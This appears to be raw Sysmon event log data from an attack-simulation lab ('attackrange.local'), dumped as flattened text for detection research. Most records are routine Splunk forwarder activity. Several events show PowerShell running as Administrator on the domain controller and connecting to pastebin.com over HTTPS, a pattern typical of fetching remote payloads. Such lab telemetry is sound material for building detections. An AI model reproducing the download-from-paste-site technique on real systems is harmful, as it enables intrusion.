AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EC1FC42F87C12AE6C879A3429F5BC48,SHA256=4E1FB90D8C2E8F8C96753D6A0BFA0D1869E59005ED400E9D8E5B77159492FEF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106590Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.183{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6DFF1F3242C9C328B5AA748D91B009F,SHA256=CD2BBBCB6EEAFEE79625ED9113DA8A062AAD5B0CC3B33F5265571FC015B32B5D,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000106603Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.388{58E9C193-B461-615A-2F02-00000000FC01}7796pastebin.com0::ffff:104.23.98.190;::ffff:104.23.99.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000106602Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.198{58E9C193-B461-615A-2B02-00000000FC01}7500pastebin.com0::ffff:104.23.98.190;::ffff:104.23.99.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000106601Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.198{58E9C193-B461-615A-2C02-00000000FC01}7508pastebin.com0::ffff:104.23.98.190;::ffff:104.23.99.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x8000000000000000106600Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.885{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49409- 23542300x8000000000000000106599Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:31.615{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB6D3DBCB9861160566869A133C3B93B,SHA256=87D6EF851AC2C7D27E85D6BE4F2133CACDAC71FC42AAA7155F90CB26B6B3BF2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082980Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B463-615A-8101-00000000FD01}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082979Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082978Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082977Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082976Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082975Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082974Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082973Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082972Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082971Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082970Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B463-615A-8101-00000000FD01}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082969Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.398{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B463-615A-8101-00000000FD01}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082968Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.399{2FDD8D40-B463-615A-8101-00000000FD01}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082967Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:31.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7D17416C7418507A6DF6315D887D254,SHA256=3417D7794F7AB05BA2361F0959625614DCA0322AE5FA7E41CDF0D82404F14034,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106598Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.386{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51847-false104.23.98.190-443https 354300x8000000000000000106597Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.199{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51846-false104.23.98.190-443https 354300x8000000000000000106596Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.199{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51845-false104.23.98.190-443https 354300x8000000000000000106595Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.189{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-639.attackrange.local54026-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000106594Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.188{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58266- 23542300x8000000000000000106605Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:32.631{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45364C913BFB7041CA12E582F16E42C6,SHA256=18D94D09F9C7262D26092FF21EED859007CC4291B8672129F7862A9959A9349F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082998Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.398{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28F35C824628B00622CC297BAAA33028,SHA256=7FF428773272273FD207F00FB7362EC8DF78A030706FA99F5722B12DA2B1996B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082997Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.398{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BAA74D1887E5FBBBAA5BE10F590A851,SHA256=4B4233723ED22061372DBE7FEF6DDFAAD2096DED68629638085D4C1C933B66AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082996Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:29.360{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50133-false10.0.1.12-8089- 10341000x800000000000000082995Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.211{2FDD8D40-B464-615A-8201-00000000FD01}29882556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082994Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.117{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB6C53A0F26C535D6D3046E741C57A6,SHA256=AEBE517A19D4962D8C5B7F077988B5CA5989857F0A50EB7685736477D06AF1B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106604Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:32.114{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=37658921A0BBF34644E0993E58A97FE0,SHA256=5058212AFB6D67E9B062111307304C37C083D41517CD10D3ED524AC267C22C66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082993Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B464-615A-8201-00000000FD01}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082992Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082991Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082990Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082989Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082988Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 